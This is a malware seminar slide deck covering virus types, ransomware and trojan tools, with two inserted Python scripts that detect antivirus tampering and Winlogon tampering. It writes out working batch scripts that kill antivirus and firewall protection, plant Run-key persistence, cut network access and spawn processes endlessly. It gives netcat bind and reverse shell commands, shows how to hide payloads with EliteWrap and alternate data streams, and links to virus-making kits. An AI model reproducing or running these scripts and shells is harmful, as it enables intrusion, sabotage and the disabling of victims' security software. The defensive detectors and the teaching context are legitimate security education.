Malware Seminar WITH CHUCK EASTTOM

About the Speaker  19 Books  32 industry certifications  2 Masters degrees  6 Computer science related patents  Over 20 years experience, over 15 years teaching/training  Helped create CompTIA Security+, Linux+, Server+. Helped revise CEH v8  Frequent consultant/expert witness Get the software for this class at

IMPORTANT  In this lesson you will learn to execute certain attacks. It is important that you understand that doing so on any computer other than a test system or a system you have permission to attack is a serious crime.  This is for you to learn techniques for penetration testing, and to understand the techniques criminals use.  I repeat: MISUSING WHAT IS IN THIS LESSON IS A SERIOUS CRIME.

Why learn it then?  There are several reasons:  Understanding malware helps to combat it.  It is possible to use innocuous ‘malware’ as part of a penetration test. This must only be done with great care and when the malware in question is  Completely innocuous  Not particularly viral (i.e. does not spread easily)  Malware is a primary weapon in cyber warfare and students in this class may be employed by government agencies.

Malware  Virus  Worms  Spyware  Logic Bomb  Rootkit  Annoyances  Browser Hijacker  Scareware  Adware  Pornware

The mechanics of a virus  Delivery  a. Via email  b. Copying over a network  c. Direct communication with exposed ports  Infection and concealment techniques (what the payload does once it runs is a separate matter)  Multipartite  Boot sector  Stealth  Armored  Encryption  Polymorphic/Metamorphic

Virus Types  Armored Virus  An armored virus uses techniques that make it hard to analyze. Code confusion is one such method. The code is written such that if the virus is disassembled, the code won’t be easily followed. Compressed code is another method for armoring the virus.

Virus Types Continued  Sparse Infection Virus  A sparse infection virus will only be active intermittently and for short periods. This makes it much harder to detect. The virus is dormant much of the time and only causes whatever malicious actions it has sporadically. If it is well written, it will only infect at random intervals, not at regular intervals. The intermittent nature of the attack is what makes them so difficult for anti virus to detect. For example the virus may not be active when a virus can is run.  In some cases the sparse infector targets a specific program but the virus only executes every 10 th time or 20 th time that target program executes. Or a sparse infector may have a burst of activity, then lay dormant for a period of time. There are a number of variations on the theme, but the basic principle is the same: to reduce the frequency of attack and thus reduce the chances for detection.

Virus Types Continued  A macro virus is written into a macro in some business application. For example, Microsoft Office allows users to write macros to automate some tasks. Microsoft Outlook is designed so that a programmer can write scripts using a subset of the Visual Basic programming language, called Visual Basic for Applications (VBA). This scripting language is, in fact, built into all Microsoft Office products. Programmers can also use the closely related VBScript language. Both languages are quite easy to learn. If such a script is attached to an and the recipient is using Outlook, then the script can execute. That execution can do any number of things, including scanning the address book, looking for addresses, sending out , deleting , and more.

Encrypted virus  Encryption is used either as armor (to hide the virus body from signature scanners) or for ransomware (to hold the victim's files hostage).  To use encryption the malware needs at least three components:  The actual malware code (which is encrypted).  A module to perform encryption/decryption.  A key.  The decryptor itself cannot be encrypted, so it is the constant part that scanners key on; polymorphic viruses therefore vary the decryptor from copy to copy as well.  On the ransomware side, one of the most widely known examples is the infamous CryptoLocker (see the Ransomware slide below).

Virus Types Continued  A multipartite virus attacks your system in multiple ways, but usually infects the boot sector as well as some other portion of the system. File infection viruses are made to infect some file on the computer, and they spread when the user runs the infected file. Boot sector viruses run when the computer boots up. A multipartite virus does both. For example, a multipartite virus might affect the boot sector and make changes to a specific file or the Windows registry.

Virus Types Continued  More sophisticated IDSs look for common shellcode signatures. But even these systems can be bypassed, by using polymorphic shellcode. One simple technique virus writers use is to encrypt the shellcode by XORing values over the shellcode,using loader code to decrypt the shellcode, and then executing the decrypted shellcode

Ransomware  One of the most widely known examples is the infamous CryptoLocker. CryptoLocker used asymmetric encryption to lock the user's files: an RSA key pair was generated for each victim on the attacker's server, files were encrypted locally, and only the attacker held the private key needed to recover them. Several varieties of CryptoLocker have been detected.  CryptoWall is a variant of CryptoLocker that looked and behaved much like it. In addition to encrypting sensitive files it would communicate with a command and control server, and even take a screenshot of the infected machine. By March of 2015 a variation of CryptoWall had been discovered which is bundled with the spyware TSPY_FAREIT.YOI and actually steals credentials from the infected system, in addition to holding files for ransom.

History of Viruses  The next few slides give you a history of viruses. This is not on the test. But it helps to give you a context, understanding how viruses have developed will allow you to better understand how they function. 14

History of Viruses  1981 Apple Viruses 1, 2, and 3 are some of the first viruses "in the wild" or public domain. Found on the Apple II operating system, the viruses spread through Texas A&M via pirated computer games.  1980’s In the early 1980s, Fred Cohen did extensive theoretical research, as well as setting up and performing numerous practical experiments, regarding viral type programs. His dissertation was presented in 1986 as part of the requirements for a doctorate in electrical engineering from the University of Southern California. This work is foundational, and any serious student of viral programs disregards it at his own risk Dr. Cohen's definition of a computer virus as "a program that can 'infect' other programs by modifying them to include a... version of itself"  1987 In November, the Lehigh virus was discovered at Lehigh University in the U.S. It was the first "memory resident file infector". A file-infecting virus attacks executable files. It gets control when the file is opened. The Lehigh virus attacked a file called COMMAND.COM. When the file was run (usually by booting from an infected disk), the virus stayed in the resident memory. 15

History of Viruses Continued  1988 In March, the first anti-virus software was written. It was designed to detect and remove the Brain virus and immunized disks against Brain infection.  1990 Viruses combining various characteristics spring up. They included Polymorphism (involves encrypted viruses where the decryption routine code is variable), Armoring (used to prevent anti-virus researchers from dissembling a virus) and Multipartite (can infect both programs and boot sectors).  1991 Symantec releases Norton Anti-Virus software. 16

History of Viruses Continued  1992 Media mayhem greeted the virus Michaelangelo in March. Predictions of massive disruptions were made and anti- virus software sales soared. As it turned out, the cases of the virus were far and few between.  1994 A virus called Kaos4 was posted on a pornography news group file. It was encoded as text and downloaded by a number of users.  1996 Concept, a macro-virus, becomes the most common virus in the world. 17

History of Viruses Continued  1999 The Melissa virus, a macro, appears. It uses Microsoft Word to infect computers and is passed on to others through Microsoft Outlook and Outlook Express programs.  2000 The "I Love You Virus" wreaks havoc around the world. It is transmitted by and when opened, is automatically sent to everyone in the user's address book  July 2001: The Code Red worm infects tens of thousands of systems running Microsoft Windows NT and Windows 2000 server software, causing an estimated $2 billion in damages. The worm is programmed to use the power of all infected machines against the White House Web site at a predetermined date. In an ad hoc partnership with virus hunters and technology companies, the White House deciphers the virus's code and blocks traffic as the worm begins its attack. 18

History of Viruses Continued  2002: Melissa virus author David L. Smith, 33, is sentenced to 20 months in federal prison.  Jan. 2003: The "Slammer" worm infects hundreds of thousands of computers in less than three hours. The fastest-spreading worm ever wreaks havoc on businesses worldwide, knocking cash machines offline and delaying airline flights.  2004 : The "MyDoom" worm becomes the fastest- spreading worm as it causes headaches -- but very little damage -- almost a year to the day after Slammer ran rampant in late January MyDoom uses "social engineering," or low-tech psychological tricks, to persuade people to open the attachment that contains the virus. It claims to be a notification that an message sent earlier has failed, and prompts the user to open the attachment to see what the message text originally said. Many people fall for it. 19

Mac Defender  This malware (scareware rather than a true virus, since it does not self-replicate) is very interesting for multiple reasons. First, because it specifically targets Macintosh computers. Most experts have long agreed that Apple products remained relatively virus-free simply because they did not have enough market share to attract the attention of virus writers. It has long been suspected that if Apple garnered a greater market share, it would also begin to get more virus attacks. That has proven to be true. Mac Defender is embedded in some web pages, and when a user visits those pages he or she is shown a fake virus scan that reports a virus and says it needs to be fixed. The "fix" is actually downloading the malware. The point is to get end users to purchase the MacDefender "antivirus" product. This is the second reason this case is noteworthy: fake antivirus attacks, also known as scareware, have become increasingly common.

FakeAV  This virus first appeared in July It affected Windows systems ranging from Windows 95 to Windows 7 and Windows server This was a fake anti-virus (thus the name FakeAV). It would popup fake virus warnings. This was not the first such fake anti-virus malware, but it was one of the more recent ones.  Symantec FakeAV eup.jsp?docid= &tabid=2 21

Levels of virus creation skill  From least skilled to most skilled:  1. Use a GUI tool  2. Use a batch file virus or simple macro virus  3. Alter existing virus code  4. Write your own from scratch  5. Write your own from scratch that is stealthy and self-destructs

Making a Virus  Terabit Virus Maker  JPS Virus Maker  Internet Worm Maker Thing  Source code for various viruses  Online virus writing resource: asp?CatId=52  I Love You virus source code  Melissa source code: melissa.txt

Tools  There are a variety of virus/Trojan/worm creation tools.  One very good website is vxheaven.org  You will also see some on the following slides

Terabit Virus Maker

Simple VBS script  Great for penetration testing demonstrations; it is harmless and does not replicate, so it is not really a virus:
  Dim msg, sapi
  msg = "You have violated security policies"
  Set sapi = CreateObject("sapi.spvoice")
  sapi.Speak msg
It uses the Windows Speech API (SAPI) to read the message aloud when the .vbs file is double-clicked.

Disable the internet (must be a .bat file)
  @echo off>c:\windows\wimn32.bat
  echo break off>>c:\windows\wimn32.bat
  echo ipconfig /release>>c:\windows\wimn32.bat
  echo end>>c:\windows\wimn32.bat
  reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
  reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
  echo You Have Been HACKED!
  PAUSE
What it does: the first line turns echo off and, through the redirect, creates (or truncates) c:\windows\wimn32.bat; the echo lines then write a second batch file into it that releases the machine's DHCP lease (the widely copied version reads ipconfig/release_all, which is not a valid switch; ipconfig /release is). The two reg add commands register that file under the HKLM and HKCU Run keys so it executes at every logon, which is the persistence part; break off and end are filler. Writing to c:\windows and to HKLM needs administrative rights, while the HKCU entry works for a standard user. Cleanup is deleting the two Run values and the file.

Endless loop
  @echo off
  :top
  START %SystemRoot%\system32\notepad.exe
  GOTO top
You can use notepad, calc, anything you like, but it keeps launching copies until the system runs out of memory or handles and locks up. Ending the cmd.exe process that is running the batch file stops it.

Batch file virus  Turns off target security:
  @echo off
  rem --
  rem Permanently Kill Anti-Virus
  net stop "Security Center"
  netsh firewall set opmode mode=disable
  tskill /A av*
  tskill /A fire*
  tskill /A anti*
  tskill /A mcafe*
  tskill /A panda*
  tskill /A PersFw
  tskill /A KAV*
  tskill /A ZONEALARM
  del /Q /F "C:\Program Files\alwils~1\avast4\*.*"
  del /Q /F "C:\Program Files\Norton~1\*.cnt"
  del /Q /F "C:\Program Files\Mcafee\*.*"
  del /Q /F "C:\Program Files\kaspersky\*.*"
This uses basic command-line tools: net stop stops a service (here the Windows Security Center service, wscsvc), netsh firewall disables the XP-era Windows Firewall (Vista and later use netsh advfirewall set allprofiles state off), tskill kills tasks by name, and del deletes files. The del flags are: /F ignore the read-only attribute and delete anyway (force); /Q quiet mode, no Yes/No prompt before deleting; /S delete from all subfolders (like the old DELTREE). Paths containing spaces must be quoted as above or del stops at the space. Every one of these lines needs administrative rights, and on current Windows, Defender's tamper protection is designed to block this kind of service stop and file deletion.
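A detection-side counterpart to the two batch files above, as an added example (not the seminar's code): a small static triage pass over a batch script that flags the defence-tampering and Run-key persistence commands they use. The sample script is a constructed copy of those commands, and the rule list is a starting point of my own, not a vendor signature set.

```python
"""Static triage of a Windows batch file for AV-tampering and persistence."""
import re
from typing import List, Pattern, Tuple

# Constructed sample input: the slide's batch commands, reproduced as data.
SAMPLE_BAT = r"""@echo off
rem Permanently Kill Anti-Virus
net stop "Security Center"
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A mcafe*
del /Q /F "C:\Program Files\Mcafee\*.*"
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
echo You Have Been HACKED!
"""

# (rule name, pattern). All case-insensitive, because cmd.exe is.
RULES: List[Tuple[str, Pattern[str]]] = [
    # Stopping Security Center (wscsvc), Defender (WinDefend) or the firewall service (mpssvc).
    ("stop-security-service",
     re.compile(r"^\s*(net|sc)\s+stop\s+.*(security center|wscsvc|windefend|mpssvc)", re.I)),
    # XP-era 'netsh firewall' or Vista+ 'netsh advfirewall' being switched off.
    ("disable-firewall",
     re.compile(r"^\s*netsh\s+(advfirewall|firewall)\s+set\s+.*(mode=disable|state\s+off)", re.I)),
    # Process kills aimed at typical AV / firewall process-name prefixes.
    ("kill-av-process",
     re.compile(r"^\s*(tskill|taskkill)\b.*\b(av|anti|fire|mcafe|panda|kav|zonealarm|persfw)", re.I)),
    # Deleting files under a security vendor's Program Files directory.
    ("delete-av-files",
     re.compile(r"^\s*del\b.*program files\\.*(avast|alwil|norton|mcafee|kaspersky)", re.I)),
    # Registering something under a Run key: autostart persistence.
    ("run-key-persistence",
     re.compile(r"^\s*reg\s+add\s+\S*currentversion\\run\b", re.I)),
]


def triage_batch(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, rule name, stripped line) for every rule hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((lineno, name, line.strip()))
    return findings


def triggered_rules(text: str) -> List[str]:
    """Distinct rule names that fired, sorted, for a one-line verdict."""
    return sorted({name for _, name, _ in triage_batch(text)})


if __name__ == "__main__":
    for lineno, name, line in triage_batch(SAMPLE_BAT):
        print(f"line {lineno:>2}  {name:<22} {line}")
    print("verdict:", ", ".join(triggered_rules(SAMPLE_BAT)) or "clean")
```

The same rules apply unchanged to the "Disable the internet" script, which only trips run-key-persistence: that is the line a reviewer should care about, since it is what survives a reboot.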

Using WScript.Shell (VBScript, not PowerShell)
  Set wshShell = WScript.CreateObject("WScript.Shell")
  Do
    WScript.Sleep 100
    wshShell.SendKeys "{ENTER}"
  Loop
Keeps pressing the Enter key every 100 milliseconds in whatever window has focus; you can substitute any other key. In SendKeys notation both ~ and {ENTER} mean the Enter key; the commonly circulated form "~(enter)" presses Enter and then types the letters e-n-t-e-r. Stop it by ending wscript.exe in Task Manager.

Virus Writing Techniques  WMIC  Spyware with GINA.dll

wmic  The Windows Management Instrumentation Command-line ( WMIC ). It can be scripted  us/library/aa394531(v=vs.85).aspx us/library/aa394531(v=vs.85).aspx  us/library/bb aspx

wmic  wmic diskdrive list

wmic  wmic useraccount list

Spyware creation techniques  The Microsoft Graphical Identification and Authentication DLL (msgina.dll) is loaded by the Winlogon executable during logon. Winlogon allows third parties to customize the logon by registering their own DLL, which sits between Winlogon and the original msgina.dll and passes calls through; since the username and password pass through it in the clear, a malicious GINA is a credential stealer. This applies to Windows NT through XP/Server 2003; Vista and later replaced GINA with Credential Providers, which offer the same hook in a different form.  us/library/windows/desktop/aa380543(v=vs.85).aspx  us/library/windows/desktop/aa374744(v=vs.85).aspx  Here is where you find such a DLL IF it exists:  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDLL  (absent by default, in which case Winlogon uses msgina.dll)  This would be advanced spyware and not common

Spyware continued  There can be legitimate third party modifications to gina.dll such as these:
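Checking for the GinaDLL value described above, as an added example that is not from the seminar: it parses a .reg export of the Winlogon key and flags a GinaDLL that is not the built-in msgina.dll. Because the same key holds two other values that persistence malware edits, Userinit and Shell, the check covers those too, comparing them with their documented defaults (userinit.exe and explorer.exe). The export below is constructed, and xyzgina.dll is a hypothetical name.

```python
"""Audit the Winlogon key from a .reg export for GINA-style tampering."""
import re
from typing import Dict, List

WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Constructed sample export (the .reg format doubles backslashes in values).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe"
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,"
"GinaDLL"="C:\\WINDOWS\\system32\\xyzgina.dll"
"""


def parse_reg_section(text: str, key: str) -> Dict[str, str]:
    """Return the REG_SZ values under `key` from a .reg export, unescaped."""
    values: Dict[str, str] = {}
    in_section = False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_section = line.strip("[]").lower() == key.lower()
            continue
        match = re.match(r'^"([^"]+)"="(.*)"$', line)
        if in_section and match:
            name, raw = match.groups()
            values[name] = raw.replace(r"\\", "\\").replace(r"\"", '"')
    return values


def _basename(path: str) -> str:
    return path.strip().lower().rsplit("\\", 1)[-1]


def audit_winlogon(values: Dict[str, str]) -> List[str]:
    """Findings for values that differ from the Winlogon defaults."""
    findings: List[str] = []
    gina = values.get("GinaDLL")
    # Default: value absent. Present but pointing at msgina.dll is unusual
    # yet benign; anything else is a replacement GINA.
    if gina is not None and _basename(gina) != "msgina.dll":
        findings.append(f"GinaDLL points at a non-default DLL: {gina}")
    # Default: "<system32>\userinit.exe," -- a second comma-separated entry
    # is the classic way to launch malware at logon.
    userinit = [p for p in values.get("Userinit", "").split(",") if p.strip()]
    if [_basename(p) for p in userinit] != ["userinit.exe"]:
        findings.append(f"Userinit altered: {values.get('Userinit')!r}")
    # Default: explorer.exe (a bare name, resolved from the Windows directory).
    if _basename(values.get("Shell", "")) != "explorer.exe":
        findings.append(f"Shell altered: {values.get('Shell')!r}")
    return findings


if __name__ == "__main__":
    for finding in audit_winlogon(parse_reg_section(SAMPLE_REG, WINLOGON_KEY)):
        print("FINDING:", finding)
```

On a live XP/2003 box the same values come from reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" out.reg; on Vista and later GinaDLL is ignored, so a Credential Provider CLSID under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers is the equivalent thing to review.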

Determine the domain  C++ code that determines the domain

Self-Destruct  C++ code that self destructs

Trojan Horse Tools  EliteWrapper  ADS, using Alternate Data Streams (an NTFS feature; the extra stream is lost if the file is copied to FAT or sent by most transfer methods)  Attach a file to a text file:  type notepad.exe > ADSFile.txt:notepad.exe  Attach a script to a file:  type somescript.vbs > ADSFile.txt:somescript.vbs  Explorer and a plain dir show only ADSFile.txt at its original size; dir /r (Vista and later) or Sysinternals streams.exe lists the hidden streams.  Brief tutorial: abusing-alternate-data.html

Using EliteWrap  You will have to temporarily turn off your anti-virus (it is flagged as a hacking tool) and then download elitewrap from  Enter the file you want to run that is visible (the cover program)  Enter operation:  1 - Pack only  2 - Pack and execute, visible, asynchronously  3 - Pack and execute, hidden, asynchronously  4 - Pack and execute, visible, synchronously  5 - Pack and execute, hidden, synchronously  6 - Execute only, visible, asynchronously  7 - Execute only, hidden, asynchronously  8 - Execute only, visible, synchronously  9 - Execute only, hidden, synchronously  Enter command line  Enter the second file (the item you are surreptitiously installing)  Enter operation  When done with files, press Enter

EliteWrap Example

EliteWrap continued  Note the file size. The text.exe is only slightly bigger than the other file. If you pack them.

EliteWrap continued  More importantly when you run elitetest.exe you only see calculator running, you don’t see the second program. But it clearly is loaded and running. And stays loaded after the original cover program (calc.exe) is closed.

Using netcat  Attach netcat to some other tool using any wrapper (like elitewrap)  Have it run nc -l -p 80 -e cmd.exe  You have just opened a bind shell on the infected machine: it listens on port 80 and hands cmd.exe to whoever connects. A reverse shell is the other direction, nc attacker_ip 80 -e cmd.exe, where the infected machine connects out to a listener you run; that version gets through firewalls that block inbound connections but allow outbound ones.  Netcat cheat sheet from SANS: resources/sec560/netcat_cheat_sheet_v1.pdf

Basic Video Tutorial

Basic Netcat commands  Receiving files  nc -l -p 1001 > received_file (the sending side runs nc host 1001 < file)  Command shell (bind shell: the listener gives cmd.exe to whoever connects)  nc -l -p 1001 -e cmd.exe  Connect to that shell  nc --ssl (followed by the target host and port; --ssl is an Ncat option rather than classic netcat, and the listener must also be started with --ssl for it to work)

Other Trojan & Related Tools  RemoteByMail: take control of a target machine remotely via email  Dark Comet RAT: take control of a machine remotely  RAT is Remote Access Trojan

Botnets  Groups of compromised computers whose owners are unaware they are being used as attackers. The individual machines are referred to as zombies or bots, and the attacker drives them from a command-and-control (C2) server.  There are tools for creating and managing botnets:  Poison Ivy: rat.com/index.php?link=download  Illusions  Zeus

Now more in depth  Screen capture spyware  Code is in the class handout, in C#, complete working code  Capture data  Send emails